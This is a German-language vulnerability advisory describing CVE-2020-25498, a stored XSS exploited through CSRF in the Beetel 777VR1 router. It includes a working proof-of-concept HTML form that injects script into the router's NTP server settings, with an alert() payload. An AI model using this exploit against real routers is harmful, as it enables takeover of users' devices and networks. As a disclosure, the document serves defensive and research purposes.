
Gespeichertes XSS über CSRF im Beetel 777VR1 Router
Es wurde festgestellt, dass der angreifbare Endpunkt keine serverseitige Eingabevalidierung und keine clientseitige Filterung für bösartige Skriptinjektionen aufweist. Ein Angreifer kann diese Schwachstelle nutzen, um ein bösartiges Skript in den Endpunkt einzuschleusen, das jedes Mal aktiviert wird, wenn ein Benutzer den angreifbaren Endpunkt öffnet. Der Angreifer kann eine bösartige URL mit einer POST-Anfragenutzlast senden, um über CSRF XSS im Admin-Modul auszuführen, das Gerät zu übernehmen und schließlich das Netzwerk zu übernehmen.
Forscher: Sayli Ambure (https://twitter.com/sayli_ambure)
MITRE CVE-Link: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25498
CSRF-HTML-Code:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/form2ntp.cgi" method="POST">
<input type="hidden" name="ntpstate" value="Enable" />
<input type="hidden" name="ntpserver" value='google.com"><script>alert(1)</script>' />
<input type="hidden" name="ntpserver2" value='google.com"><script>alert(2)</script>' />
<input type="hidden" name="ntpinterval" value="1" />
<input type="hidden" name="ntptimezone" value="330" />
<input type="hidden" name="submit.htm?time.htm" value="Send" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Parameter: Servername
Parameter: Schlüsselwort